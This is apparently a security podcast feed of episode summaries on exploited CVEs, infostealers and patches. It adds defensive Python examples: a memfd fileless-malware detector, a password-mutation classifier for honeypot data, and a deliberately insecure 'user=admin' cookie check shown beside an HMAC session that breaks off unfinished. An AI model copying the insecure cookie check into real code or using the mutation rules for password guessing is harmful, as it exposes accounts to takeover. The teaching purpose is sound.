The binary file analysis tool Kaitai Struct is now available in a web-only version. https://isc.sans.edu/diary/Kaitai%20Struct%20WebIDE/32422

WSUS Emergency Update
Microsoft released an emergency patch for WSUS to fix a currently exploited critical vulnerability. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287

Network Security Devices Endanger Orgs with 90s-era Flaws
Attackers increasingly use simple-to-exploit network security device vulnerabilities to compromise organizations. https://www.csoonline.com/article/4074945/network-security-devices-endanger-orgs-with-90s-era-flaws.html

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, October 24th, 2025: Android Infostealer; SessionReaper Exploited; BIND/unbound DNS Spoofing fix; WSUS Exploit
Oct 24, 2025, 6:25

Infostealer Targeting Android Devices
This infostealer, written in Python, specifically targets Android phones. It takes advantage of Termux to gain access to data and exfiltrates it via Telegram. https://isc.sans.edu/diary/Infostealer%20Targeting%20Android%20Devices/32414

Attackers exploit recently patched Adobe Commerce Vulnerability CVE-2025-54236
Six weeks after Adobe's emergency patch, SessionReaper (CVE-2025-54236) has entered active exploitation. E-commerce security company Sansec has detected multiple exploit attempts. https://sansec.io/research/sessionreaper-exploitation

Patch for BIND and unbound nameservers CVE-2025-40780
The Internet Systems Consortium (ISC.org), as well as the Unbound project, patched a flaw that may allow DNS spoofing due to a weak random number generator. https://kb.isc.org/docs/cve-2025-40780

WSUS Exploit Released CVE-2025-59287
Hawktrace released a walkthrough showing how to exploit the recently patched WSUS vulnerability. https://hawktrace.com/blog/CVE-2025-59287

Black Hills Information Security
Online Book Store Takes Down Half the Internet - BHIS - Talkin' Bout [infosec] News 2025-10-20
Oct 24, 2025, 68:01

Register for FREE Infosec Webcasts, Anti-casts & Summits – https://poweredbybhis.com
00:00:00 - PreShow Banter™ — AWS Snow Day Party
00:11:31 - Online Book Store Takes Down Half of the Internet - BHIS - Talkin' Bout [infosec] News 2025-10-20
00:12:12 - Story # 1: F5 says hackers stole undisclosed BIG-IP flaws, source code
00:35:11 - Story # 2: Newsom signs age verification law, siding with tech giants over Hollywood
00:48:39 - Story # 3: Researchers find a startlingly cheap way to steal your secrets from space
00:55:04 - Story # 4: Jeff Bezos Has a Plan to Curb AI's Carbon Footprint: Send Data Centers to Space
01:02:22 - Story # 5: SolarWinds Security Chief reflects on the Russian hack that exposed US government agencies

UNSECURITY: Information Security Podcast
Unsecurity Episode 249: Navigating Holiday Threats with AI and VPN Vulnerabilities w/ Pinky

Oct 24, 2025 (duration 37:04)


In this episode of the Unsecurity Podcast, hosted by Megan Larkins and Brad Nigh from FRSecure, we are joined by Pinky from the IR team to dive deep into the pressing cybersecurity challenges as the holiday season approaches. From early breaches to the increasing sophistication of AI in phishing attacks, discover how attackers are evolving their tactics. The trio discusses the impact of VPN vulnerabilities, the rise of AI-enabled chatbots in ransomware scenarios, and how businesses can prepare for the uptick in threats during this busy time of year. Whether you're an IT professional or just curious about cybersecurity, this episode is packed with valuable insights. Don't miss out!

-- Like, subscribe, and share with your network to stay informed about the latest in cybersecurity!

Looking to get in touch? Reach out at unsecurity@frsecure.com and follow us for more!
LinkedIn: https://www.linkedin.com/company/frsecure/
Instagram: https://www.instagram.com/frsecureofficial/
Facebook: https://www.facebook.com/frsecure/
BlueSky: https://bsky.app/profile/frsecure.bsky.social

About FRSecure: https://frsecure.com/
FRSecure is a mission-driven information security consultancy headquartered in Minneapolis, MN. Our team of experts is constantly developing solutions and training to assist clients in improving the measurable fundamentals of their information security programs. These fundamentals are lacking in our industry, and while progress is being made, we can't do it alone. Whether you're wondering where to start or looking for a team of experts to collaborate with you, we are ready to serve.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, October 23rd, 2025: Blue Angel Software Exploit; Oracle CPU; Rust tar library vulnerability.

Oct 23, 2025 (duration 7:28)


webctrl.cgi / Blue Angel Software Suite Exploit Attempts. Maybe a CVE-2025-34033 variant? Our honeypots detected attacks that appear to exploit CVE-2025-34033 or a similar vulnerability in the Blue Angel Software Suite. https://isc.sans.edu/diary/webctrlcgiBlue+Angel+Software+Suite+Exploit+Attempts+Maybe+CVE202534033+Variant/32410

Oracle Critical Patch Update. Oracle released its quarterly Critical Patch Update. The update includes patches for 374 vulnerabilities across all of Oracle's products. There are nine more patches for Oracle's E-Business Suite. https://www.oracle.com/security-alerts/cpuoct2025.html#AppendixEBS

Rust tar Library Vulnerability. A vulnerability in the popular, but no longer maintained, async-tar library could lead to arbitrary code execution. https://edera.dev/stories/tarmageddon

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, October 22nd, 2025: NTP Pool; Xubuntu Compromise; Squid Vulnerability; Lanscope Vuln;

Oct 22, 2025 (duration 6:37)


What time is it? Accuracy of pool.ntp.org. How accurate and reliable is pool.ntp.org? Turns out it is very good! https://isc.sans.edu/diary/What%20time%20is%20it%3F%20Accuracy%20of%20pool.ntp.org./32390

Xubuntu Compromise. The Xubuntu website was compromised last weekend and served malware. https://floss.social/@bluesabre/115401767635718361

Squid Proxy Vulnerability. The Squid team fixed an information disclosure vulnerability that may leak authentication credentials. https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr

Lanscope Endpoint Manager Vulnerability. https://jvn.jp/en/jp/JVN86318557/index.html

CERIAS Security Seminar Podcast
Rajiv Khanna, The Shape of Trust: Structure, Stability, and the Science of Unlearning

Oct 22, 2025 (duration 55:42)


Trust in modern AI systems hinges on understanding how they learn—and, increasingly, how they can forget. This talk develops a geometric view of trustworthiness that unifies structure-aware optimization, stability analysis, and the emerging science of unlearning. I will begin by revisiting the role of sharpness and flatness in shaping both generalization and sample sensitivity, showing how the geometry of the loss landscape governs what models remember. Building on these insights, I will present recent results on Sharpness-Aware Machine Unlearning, a framework that characterizes when and how learning algorithms can provably erase the influence of specific data points while preserving accuracy on the rest. The discussion connects theoretical guarantees with empirical findings on the role of data distribution and loss geometry in machine unlearning—ultimately suggesting that the shape of the optimization landscape is the shape of trust itself.

About the speaker: Rajiv Khanna is an Assistant Professor in the Department of Computer Science. His research interests span various subfields of machine learning including optimization, theory and interpretability. Previously, he held positions of Visiting Faculty Researcher at Google, postdoctoral scholar at the Foundations of Data Analytics Institute at the University of California, Berkeley and Research Fellow in the Foundations of Data Science program at the Simons Institute, also at UC Berkeley. He graduated with his PhD from UT Austin.

ITSPmagazine | Technology. Cybersecurity. Society
New Book: SPIES, LIES, AND CYBER CRIME | Former FBI Spy Hunter Eric O'Neill Explains How Cybercriminals Use Espionage techniques to Attack Us | Redefining Society And Technology Podcast With Marco Ciappelli

Oct 21, 2025 (duration 48:16)


SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, October 21st, 2025: Syscall() Obfuscation; AWS down; Beijing Time Attack

Oct 20, 2025 (duration 9:17)


Using Syscall() for Obfuscation/Fileless Activity. Fileless malware written in Python can use syscall() to create file descriptors in memory, evading signatures. https://isc.sans.edu/diary/Using%20Syscall%28%29%20for%20Obfuscation%20Fileless%20Activity/32384

AWS Outages. AWS has had issues most of the day on Monday, affecting numerous services. https://health.aws.amazon.com/health/status

Time Server Hack. China reports a compromise of its time standard servers. https://thehackernews.com/2025/10/mss-claims-nsa-used-42-cyber-tools-in.html
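For the syscall() item: the in-memory descriptor is most likely created with memfd_create(2), reached through the raw syscall() interface so that the function name never appears in the script (an assumption here; the diary is the authority on the sample). What a defender can do with that is look at /proc, because an anonymous file shows up as a '/memfd:<name> (deleted)' link target under /proc/<pid>/fd and, if it was executed, under /proc/<pid>/exe. The block below is an added detection example written for this page, not the diary's or the malware's code. SAMPLE_FDS is a constructed stand-in for readlink() output so the block runs offline; collect_live_fds() is the part that reads a real Linux /proc tree.

```python
"""Flag processes holding memfd-backed descriptors (added example, not the
ISC diary's tooling). SAMPLE_FDS is a constructed stand-in for readlink()."""
import os
import re
from typing import Dict, List

# The kernel names anonymous files from memfd_create() "/memfd:<name> (deleted)"
# when seen through /proc/<pid>/fd/* or /proc/<pid>/exe (see memfd_create(2)).
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")

# Constructed sample: pid -> readlink() results for that process's open fds.
SAMPLE_FDS: Dict[int, List[str]] = {
    1234: ["/dev/null", "/dev/null", "/var/log/app.log"],
    4321: ["/dev/pts/0", "/memfd: (deleted)", "socket:[183726]"],
    5555: ["/memfd:kittens (deleted)", "/usr/lib/locale/locale-archive"],
}


def memfd_names(targets: List[str]) -> List[str]:
    """Return the memfd names among a list of fd link targets ('' if unnamed)."""
    hits = []
    for target in targets:
        match = MEMFD_RE.match(target)
        if match:
            hits.append(match.group("name"))
    return hits


def suspicious_pids(fd_map: Dict[int, List[str]]) -> Dict[int, List[str]]:
    """Keep only processes holding at least one memfd-backed descriptor."""
    result: Dict[int, List[str]] = {}
    for pid, targets in fd_map.items():
        names = memfd_names(targets)
        if names:
            result[pid] = names
    return result


def collect_live_fds(proc_root: str = "/proc") -> Dict[int, List[str]]:
    """Build the same pid -> targets map from a real Linux /proc tree.
    Reading other users' processes needs privileges; processes that exit
    mid-scan are skipped instead of aborting the sweep."""
    fd_map: Dict[int, List[str]] = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            targets = [os.readlink(os.path.join(fd_dir, fd))
                       for fd in os.listdir(fd_dir)]
        except OSError:
            continue
        fd_map[int(entry)] = targets
    return fd_map


if __name__ == "__main__":
    # Swap SAMPLE_FDS for collect_live_fds() to sweep a live host.
    for pid, names in suspicious_pids(SAMPLE_FDS).items():
        print(f"pid {pid}: memfd-backed fd(s) {names}")
```

memfd is also used legitimately (systemd, browsers, graphics stacks), so treat a hit as a lead to pivot on, for instance an interpreter such as python3 holding one, or /proc/<pid>/exe itself resolving to /memfd:, rather than as a verdict.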

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, October 20th, 2025: Malicious Tiktok; More Google Ad Problems; Satellite Insecurity

Oct 19, 2025 (duration 6:14)


TikTok Videos Promoting Malware Installation. TikTok videos advertising ways to obtain software like Photoshop for free will instead trick users into downloading malware. https://isc.sans.edu/diary/TikTok%20Videos%20Promoting%20Malware%20Installation/32380

Google Ads Advertise Malware Targeting macOS Developers. Hunt.io discovered Google ads that pretend to advertise tools like Homebrew and password managers to spread malware. https://hunt.io/blog/macos-odyssey-amos-malware-campaign

Satellite Transmissions Are Often Unencrypted. A large amount of satellite traffic is unencrypted and easily accessible to eavesdropping. https://satcom.sysnet.ucsd.edu

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, October 17th, 2025: New Slack Workspace; Cisco SNMP Exploited; BIOS Backdoor; @sans_edu research: Active Defense

Oct 17, 2025 (duration 21:28)


New DShield Support Slack Workspace. Due to an error on Salesforce's side, we had to create a new Slack workspace for DShield support. https://isc.sans.edu/diary/New%20DShield%20Support%20Slack/32376

Attackers Exploiting Recently Patched Cisco SNMP Flaw (CVE-2025-20352). Trend Micro published details explaining how attackers took advantage of a recently patched Cisco SNMP vulnerability. https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte

Framework BIOS Backdoor. The mm command implemented in Framework BIOS shells can be used to compromise a device pre-boot. https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/

SANS.edu Research: Mark Stephens, Validating the Effectiveness of MITRE Engage and Active Defense. https://www.sans.edu/cyber-research/validating-effectiveness-mitre-engage-active-defense/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, October 16th, 2025: Clipboard Image Stealer; F5 Compromise; Adobe Updates; SAP Patchday

Oct 15, 2025 (duration 8:40)


Clipboard Image Stealer. Xavier presents an infostealer in Python that steals images from the clipboard. https://isc.sans.edu/diary/Clipboard%20Pictures%20Exfiltration%20in%20Python%20Infostealer/32372

F5 Compromise. F5 announced a wide-ranging compromise today. Source code and information about unpatched vulnerabilities were stolen. https://my.f5.com/manage/s/article/K000157005 https://my.f5.com/manage/s/article/K000156572 https://my.f5.com/manage/s/article/K000154696

Adobe Updates. Adobe updated 12 different products yesterday. https://helpx.adobe.com/security.html

SAP Patchday. Among the critical vulnerabilities patched in SAP's products are two deserialization vulnerabilities with a CVSS score of 10.0. https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html https://onapsis.com/blog/sap-security-patch-day-october-2025/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, October 15th, 2025: Microsoft Patchday; Ivanti Advisory; Fortinet Patches

Oct 14, 2025 (duration 6:22)


Microsoft Patch Tuesday. Microsoft not only released new patches, but also the last patches for Windows 10, Office 2016, Office 2019, Exchange 2016 and Exchange 2019. https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20October%202025/32368

Ivanti Advisory. Ivanti released an advisory with some mitigation steps users can take until the recently made public vulnerabilities are patched. https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-October-2025?language=en_US

Fortinet Patches. https://fortiguard.fortinet.com/psirt/FG-IR-25-010 https://fortiguard.fortinet.com/psirt/FG-IR-24-361

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, October 14th, 2025: ESAFENET Scans; Payroll Pirates; MSFT Edge IE Mode

Oct 13, 2025 (duration 6:02)


Scans for ESAFENET CDG V5. We do see some increase in scans for the Chinese secure document management system ESAFENET. https://isc.sans.edu/diary/Heads%20Up%3A%20Scans%20for%20ESAFENET%20CDG%20V5%20/32364

Investigating Targeted Payroll Pirate Attacks Affecting US Universities. Microsoft wrote about how payroll pirates redirect employee paychecks via phishing. https://www.microsoft.com/en-us/security/blog/2025/10/09/investigating-targeted-payroll-pirate-attacks-affecting-us-universities/

Attacks Against Edge via IE Mode. Microsoft Edge offers an IE legacy mode to support websites created for Internet Explorer. The old JavaScript engine, which is part of this mode, has been abused in recent attacks, and Microsoft will make it more difficult to enable IE Mode to counter these attacks. https://microsoftedge.github.io/edgevr/posts/Changes-to-Internet-Explorer-Mode-in-Microsoft-Edge/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, October 13th, 2025: More Oracle Patches; SonicWall Compromises; Unpatched Gladinet; 7-Zip Patches

Oct 12, 2025 (duration 5:56)


New Oracle E-Business Suite Patches. Oracle released one more patch for the E-Business Suite. Oracle does not state if it is already exploited, but the timing of the patch suggests that it should be expedited. https://www.oracle.com/security-alerts/alert-cve-2025-61884.html

Widespread SonicWall SSLVPN Compromise. Huntress Labs observed the widespread compromise of SonicWall SSLVPN appliances. https://www.huntress.com/blog/sonicwall-sslvpn-compromise

Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw (CVE-2025-11371). An unpatched vulnerability in the secure file sharing solutions Gladinet CentreStack and Triofox is being exploited. https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw

Two 7-Zip Vulnerabilities, CVE-2025-11002 and CVE-2025-11001. 7-Zip patched two vulnerabilities that may lead to arbitrary code execution. https://www.zerodayinitiative.com/advisories/ZDI-25-949/ https://www.zerodayinitiative.com/advisories/ZDI-25-950/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, October 10th, 2025: RedTail Defenses; SonicWall Breach; Crowdstrike “Issues”; Ivanti 0-days; Mapping Agentic Attack Surface (@sans_edu paper)

Oct 10, 2025 (duration 15:12)


Building Better Defenses: RedTail Observations. Defending against attacks like RedTail is more than blocking IoCs; instead one must focus on the techniques and tactics attackers use. https://isc.sans.edu/diary/Guest+Diary+Building+Better+Defenses+RedTail+Observations+from+a+Honeypot/32312

SonicWall: It wasn't the user's fault. SonicWall admits to a breach resulting in the loss of user configurations stored in its cloud service. https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330

CrowdStrike has Issues. CrowdStrike fixes two vulnerabilities in the Windows version of its Falcon sensor. https://www.crowdstrike.com/en-us/security-advisories/issues-affecting-crowdstrike-falcon-sensor-for-windows/

Interrogators: Attack Surface Mapping in an Agentic World. A SANS.edu master's degree student research paper by Michael Samson. https://isc.sans.edu/researchpapers/pdfs/michael_samson.pdf

keywords: ai; agentic; attack surface; crowdstrike; sonicwall; ivanti; zero day; initiative; redline

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, October 9th, 2025: Polymorphic Python; ssh ProxyCommand Vuln;

Oct 9, 2025 (duration 6:12)


Polymorphic Python Malware. Xavier discovered self-modifying Python code on VirusTotal. The remote access tool takes advantage of the inspect module to modify code on the fly. https://isc.sans.edu/diary/Polymorphic%20Python%20Malware/32354

SSH ProxyCommand Vulnerability. A user cloning a git repository may be tricked into executing arbitrary code via the SSH ProxyCommand option. https://dgl.cx/2025/10/bash-a-newline-ssh-proxycommand-cve-2025-61984

Framelink Figma MCP Server CVE-2025-53967. Framelink Figma's MCP server suffers from a remote code execution vulnerability.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, October 8th, 2025: FreePBX Exploits; Disrupting Teams Threats; Kibana and QT SVG Patches

Oct 8, 2025 (duration 5:57)


FreePBX Exploit Attempts (CVE-2025-57819). A FreePBX SQL injection vulnerability disclosed in August is being used to execute code on affected systems. https://isc.sans.edu/diary/Exploit%20Against%20FreePBX%20%28CVE-2025-57819%29%20with%20code%20execution./32350

Disrupting Threats Targeting Microsoft Teams. Microsoft published a blog post outlining how to better secure Teams. https://www.microsoft.com/en-us/security/blog/2025/10/07/disrupting-threats-targeting-microsoft-teams/

Kibana XSS Patch CVE-2025-25009. Elastic patched a stored XSS vulnerability in Kibana. https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-and-9-1-5-security-update-esa-2025-20/382449

Qt SVG Vulnerabilities CVE-2025-10728, CVE-2025-10729. The Qt Group fixed two vulnerabilities in the Qt SVG module. One of the vulnerabilities may be used for code execution. https://www.qt.io/blog/security-advisory-uncontrolled-recursion-and-use-after-free-vulnerabilities-in-qt-svg-module-impact-qt

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, October 7th, 2025: More About Oracle; Redis Vulnerability; GoAnywhere Exploited

Oct 7, 2025 (duration 5:33)


More Details About Oracle 0-Day. The exploit is now widely distributed and has been analyzed to show the nature of the underlying vulnerabilities. https://isc.sans.edu/diary/Quick%20and%20Dirty%20Analysis%20of%20Possible%20Oracle%20E-Business%20Suite%20Exploit%20Script%20%28CVE-2025-61882%29%20%5BUPDATED%5B/32346 https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/

Redis Vulnerability. Redis patched a critical use-after-free vulnerability that could lead to arbitrary code execution. https://redis.io/blog/security-advisory-cve-2025-49844/

GoAnywhere Bug Exploited. Microsoft is reporting on the exploitation of the recent GoAnywhere vulnerability. https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/

PreSales Podcast by PreSales Collective
From Overloaded to Optimized: Concierge Services and Deal Desks with Rob Bruce

Oct 7, 2025 (duration 30:52)


In this episode, Jack Cochran and Matthew James are joined by Rob Bruce, a presales leader at Syndigo with 20 years of experience, to discuss an innovative approach to presales operations: the Pursuit Desk. Rob shares how Syndigo has built a dedicated "concierge team" that handles RFPs, security questionnaires, reference coordination, and other time-consuming tasks, freeing solutions engineers to focus on discovery, solutioning, and building customer relationships. The conversation explores how to operate at the "top of your license," the role of AI in scaling pursuit operations, and practical advice for championing similar initiatives at your organization.

Thank you to Elvance for sponsoring this episode: https://elvance.io

Follow Us
Connect with Jack Cochran: https://www.linkedin.com/in/jackcochran/
Connect with Matthew James: https://www.linkedin.com/in/matthewyoungjames/
Connect with Rob Bruce: https://www.linkedin.com/in/robbruce/

Links and Resources Mentioned
Join Presales Collective Slack: https://www.presalescollective.com/slack
Book: "Selling is Hard, Buying is Harder" by Garen Hess

Timestamps
00:00 Welcome
04:29 What is a Presales Concierge
11:18 Presales culture
14:00 Working at the top of your diploma
17:10 How do you justify this
21:38 As focused as an F1 team
23:32 AI and the Pursuit Desk

Key Topics Covered

The Pursuit Desk Concept
- Functions as a presales concierge handling non-customer-facing tasks
- Manages RFPs, InfoSec documents, NDAs, reference coordination
- Creates centralized control over messaging and responses
- Operates on a global scale with cultural sensitivity

Operating at the Top of Your License
- Focus on discovery, creative thinking, empathetic listening, and presenting solutions
- Eliminate time spent on administrative tasks that don't require SE expertise
- Reduce context switching and multitasking to maintain flow
- Maximize value delivery to customers and the organization

Building the Business Case
- Find an executive sponsor to champion the initiative
- Measure impact through deal win rates and velocity
- Consider creative budget reallocation (travel budgets, etc.)
- Calculate ROI based on SE productivity and reduced burnout

The Role of AI in Pursuit Operations
- AI handles first-pass RFP responses (80% completion)
- Pursuit desk personalizes and adds empathy (final 20%)
- Machine learning analyzes past deals for pattern recognition
- Go/no-go scorecards based on historical data
- Enables scaling without proportional headcount increases

Presales Culture and Values
- Building trust through technical expertise and genuine personality
- Being a "chameleon" who adapts to different buyer needs
- Creating an environment where people feel welcomed and valued
- Mentorship and knowledge sharing across teams

Preventing Burnout
- Eliminating nights and weekends spent on RFPs
- Reducing stress through better task distribution
- Enabling SEs to focus on work they're passionate about
- Creating sustainable workloads that retain top talent

Measuring Success
- Tracking time spent on each RFP or pursuit activity
- Correlating effort to win-loss rates
- Building audit trails for continuous improvement
- Creating dashboards for data-driven decision making

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

Oracle E-Business Suite 0-Day CVE-2025-61882. Last week, the Cl0p ransomware gang sent messages to many businesses stating that an Oracle E-Business Suite vulnerability was used to exfiltrate data. Initially, Oracle believed the root cause to be a vulnerability patched in June, but now Oracle has released a patch for a new vulnerability. https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

Zimbra Exploit Analysis. An exploit against a Zimbra system prior to the patch release is analyzed. These exploits take advantage of .ics files to breach vulnerable systems. https://strikeready.com/blog/0day-ics-attack-in-the-wild/

Unity Editor Vulnerability CVE-2025-59489. The Unity game editor suffered from a code execution vulnerability that would also expose software developed with vulnerable versions. https://unity.com/security/sept-2025-01

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, October 3rd, 2025: More .well-known Scans; RedHat Openshift Patch; TOTOLINK Vuln;

Oct 3, 2025 (duration 6:35)


More .well-known Scans. Attackers are using API documentation automatically published in the .well-known directory for reconnaissance. https://isc.sans.edu/diary/More%20.well-known%20Scans/32340

Red Hat Patches OpenShift AI Services. A flaw was found in Red Hat OpenShift AI Service. A low-privileged attacker with access to an authenticated account, for example as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator. https://access.redhat.com/security/cve/cve-2025-10725#cve-affected-packages

TOTOLINK X6000R Vulnerabilities. Palo Alto released details regarding three recently patched vulnerabilities in TOTOLINK X6000R routers. https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/

DrayOS Vulnerability Patched. DrayTek fixed a single memory corruption vulnerability in its Vigor series routers. An unauthenticated user may use it to execute arbitrary code. https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, October 2nd, 2025: Honeypot Passwords; OneLogin Vuln; Breaking Intel SGX; OpenSSL Patch

Oct 2, 2025 (duration 8:11)


Comparing Honeypot Passwords with HIBP. Most passwords used against our honeypots are also found in the Have I Been Pwned list. However, the few percent that are not found tend to be variations of known passwords, extending them to find likely mutations. https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Comparing%20Honeypot%20Passwords%20with%20HIBP/32310

Breaking Server SGX via DRAM Inspection. By observing read and write operations to memory, it is possible to derive keys stored in SGX and break the security of systems relying on SGX. https://wiretap.fail/files/wiretap.pdf

OneLogin OIDC Vulnerability. A vulnerability in OneLogin can be used to read secret application keys. https://www.clutch.security/blog/onelogin-many-secrets-clutch-uncovers-vulnerability-exposing-client-credentials

OpenSSL Patch. OpenSSL patched three vulnerabilities. One could lead to remote code execution, but the feature is used infrequently, and the exploit is difficult, according to OpenSSL.
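The "variations of known passwords" point in the first item is worth making concrete. The block below is an added example written for this page, not the guest diary's code: it expands each entry of a small constructed known-password set into the mutations attackers commonly try (case forms, leet substitutions, digit, year and symbol suffixes), labels constructed honeypot observations as known, mutation or novel, and shows the SHA-1 prefix/suffix split the HIBP range API uses so the full hash never leaves the client. The mutation rules and both sample lists are assumptions chosen for illustration; a real run would load a breach list or query the range endpoint instead of the in-memory set.

```python
"""Classify observed (honeypot) passwords against a known list and the common
mutations of its entries (added example, not the diary's code).
KNOWN and OBSERVED are constructed samples."""
import hashlib
from typing import Dict, Iterable, Set, Tuple

# Simple leet substitutions and the suffixes most often bolted onto a base word
# (assumed rules for the example; real wordlists use far richer rule sets).
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ["1", "12", "123", "!", "!1", "@", "2024", "2025"]

KNOWN: Set[str] = {"password", "admin", "123456", "welcome"}          # constructed
OBSERVED = ["password", "P@$$w0rd123", "admin2025", "Welcome!",      # constructed
            "xK9#qL2m", "123456"]


def mutations(base: str) -> Set[str]:
    """Variants of one password: case forms, leet forms, and suffixes on each."""
    forms = {base, base.capitalize(), base.upper()}
    forms |= {form.translate(LEET) for form in forms}
    out = set(forms)
    for form in forms:
        for suffix in SUFFIXES:
            out.add(form + suffix)
    return out


def classify(observed: Iterable[str], known: Set[str]) -> Dict[str, str]:
    """Label each observed password 'known', 'mutation' (derived from a known
    password) or 'novel' (a candidate for a new wordlist entry)."""
    derived: Dict[str, str] = {}          # variant -> base it was derived from
    for base in known:
        for variant in mutations(base):
            derived.setdefault(variant, base)
    result: Dict[str, str] = {}
    for pw in observed:
        if pw in known:
            result[pw] = "known"
        elif pw in derived:
            result[pw] = "mutation"
        else:
            result[pw] = "novel"
    return result


def hibp_range_prefix(password: str) -> Tuple[str, str]:
    """Split SHA-1(password) into the 5-hex-char prefix that HIBP's range
    endpoint takes and the 35-char suffix matched locally against its reply,
    so the full hash never leaves the client (k-anonymity)."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


if __name__ == "__main__":
    for pw, label in classify(OBSERVED, KNOWN).items():
        print(f"{pw:<14} {label}")
    print("HIBP range lookup for 'password':", hibp_range_prefix("password"))
```

The "novel" bucket is the interesting output: it is what remains after the known list and its mutations are removed, and it is the set the diary suggests feeding back into a wordlist.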

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, October 1st, 2025: Cookie Auth Issues; Western Digital Command Injection; sudo exploited;

Oct 1, 2025 (duration 5:10)


Sometimes you don't even need to log in. Applications using simple, predictable cookies to verify a user's identity are still exploited, and relatively recent vulnerabilities are still due to this very basic mistake. https://isc.sans.edu/diary/%22user%3Dadmin%22.%20Sometimes%20you%20don%27t%20even%20need%20to%20log%20in./32334

Western Digital My Cloud Vulnerability. Western Digital patched a critical vulnerability in its My Cloud device. https://nvd.nist.gov/vuln/detail/CVE-2025-30247

sudo vulnerability exploited. A recently patched vulnerability in sudo is now being exploited. https://www.sudo.ws/security/advisories/
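The "predictable cookie" mistake from the first item, side by side with the usual fix, as an added example for this page (not code from any product in the diary): the weak handler trusts a client-written user= cookie, so any client can claim to be admin; the hardened handler only accepts a server-issued token whose HMAC it can verify and whose expiry has not passed. SECRET_KEY, the token layout and the cookie name are assumptions for the example.

```python
"""Weak cookie identity next to an HMAC-signed session token (added example,
not code from any affected product). SECRET_KEY is a constructed placeholder."""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


# --- Weak pattern: the client-controlled cookie value *is* the identity. ---
def weak_current_user(cookie_header: str) -> Optional[str]:
    """Trusts 'user=<name>' verbatim; sending 'Cookie: user=admin' is enough."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == "user":
            return value
    return None


# --- Hardened pattern: server-issued, HMAC-signed, expiring token. ---
SECRET_KEY = b"constructed-example-key-rotate-me"  # placeholder; load from a secrets store


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session(user: str, ttl_seconds: int = 3600, now: Optional[int] = None) -> str:
    """Return '<payload>.<mac>'; the payload carries the user and an expiry."""
    now = int(time.time()) if now is None else now
    payload = json.dumps({"u": user, "exp": now + ttl_seconds},
                         separators=(",", ":")).encode()
    mac = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return f"{b64url_encode(payload)}.{b64url_encode(mac)}"


def verify_session(token: str, now: Optional[int] = None) -> Optional[str]:
    """Return the user if the MAC verifies and the token is unexpired, else None."""
    now = int(time.time()) if now is None else now
    try:
        payload_b64, mac_b64 = token.split(".", 1)
        payload, mac = b64url_decode(payload_b64), b64url_decode(mac_b64)
    except ValueError:  # malformed token or bad base64 (binascii.Error is a ValueError)
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):  # constant-time comparison
        return None
    data = json.loads(payload)                  # only parsed after the MAC checks out
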